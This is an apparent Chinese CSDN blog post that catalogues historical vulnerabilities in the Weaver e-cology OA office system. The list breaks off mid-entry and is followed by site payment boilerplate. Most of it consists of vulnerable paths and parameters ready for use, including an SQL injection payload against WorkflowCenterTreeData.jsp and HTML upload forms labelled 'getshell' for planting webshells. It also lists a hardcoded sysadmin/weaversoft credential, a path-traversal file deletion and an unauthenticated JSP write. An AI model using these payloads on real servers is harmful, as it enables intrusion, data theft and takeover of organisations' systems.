Web安全-泛微相关系统-历史漏洞

本文详细列举了泛微e-cology OA系统自2019年以来遭遇的各种安全漏洞,包括数据库配置信息泄漏、SQL注入、远程代码执行等重大风险。这些漏洞影响了多个版本,如7.0、8.0、8.1等,并提供了攻击payload示例。此外,还提到了利用这些漏洞可能导致的敏感信息泄露、系统权限滥用、文件上传漏洞和XSS攻击等问题。
摘要由CSDN通过智能技术生成

2019年
泛微e-cology OA数据库配置信息泄漏
包括不限于8.0、9.0版本
/mobile/dbconfigreader.jsp

2019年
泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc)


2019年
泛微e-cology OA系统远程代码执行
0x02 影响范围
包括但不限于7.0,8.0,8.1
/weaver/bsh.servlet.BshServlet/


CNVD-2019-34241
/mobile/browser/WorkflowCenterTreeData.jsp
受影响版本
泛微e-cology OA系统 JSP版本
Payload:
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

 

 

缺陷编号:wooyun-2015-0132247
漏洞标题:泛微OA办公系统一处通用SQL注入(需要登陆)
包含6.0及7.0版本
/workflow/FormBillBrowser.jsp
参数:formName 拼接sql未过滤


wooyun-2015-0137850
泛微OA系统通用任意文件上传getshell(附官方案例)
影响6.0、7.0、7.100、8.0(需要登录)
/page/maint/common/UserResourceUpload.jsp?dir=/
(1)存在文件上传绕过(更改后缀:1.jsp.,1.jspx ; 0x00截断)
(2)上传路径可控
payload:
<form method='post' action='http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>


wooyun-2015-0140003
泛微OA通用系统三处SQL注入打包(官网可复现无需登录)
(1)/mobile/plugin/loadWfGraph.jsp requestid
(2)//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1 nodeid
(3)//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2* id

 


缺陷编号:wooyun-2016-0178866
漏洞标题:泛微OA某接口无需登录可执行任意SQL语句(附脚本)
/ws /ws/query?wsdl XML注入


缺陷编号:wooyun-2016-0169872
漏洞标题:泛微OA某处缺陷可遍历和操作系统文件
plugin\ewe\jsp\config.jsp
sUsername = "sysadmin";
sPassword = "weaversoft"
(1)/plugin/ewe/admin/default.jsp 新建文件1.txt
(2)越权删除文件: /plugin/ewe/admin/upload.jsp?id=11&dir=../../../../


wooyun-2015-0155705
泛微OA未授权可导致GetShell
/sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp
上传马路径:/sysinterface/extpage/ccccc.jsp
路径可控:
/sysinterface/codeEdit.jsp?filename=。../../ccccc.jsp&filetype=jsp
上传马路径:http://url/ccccc.jsp


缺陷编号:wooyun-2015-0141834
漏洞标题:雨润集团泛微OA系统表单任意上传拿shell
/tools/SWFUpload/upload.jsp
payload:
<form method='post' action='http://url/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
上传马路径:http://url/shell.jsp


缺陷编号:wooyun-2015-0138725
漏洞标题:泛微OA通用系统存在SQL注入漏洞(官网可复现无需登录)
/mobile/plugin/PreDownload.jsp url sql拼接未过滤


缺陷编号:wooyun-2015-0132258
漏洞标题:泛微OA系统存在SQL注入漏

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值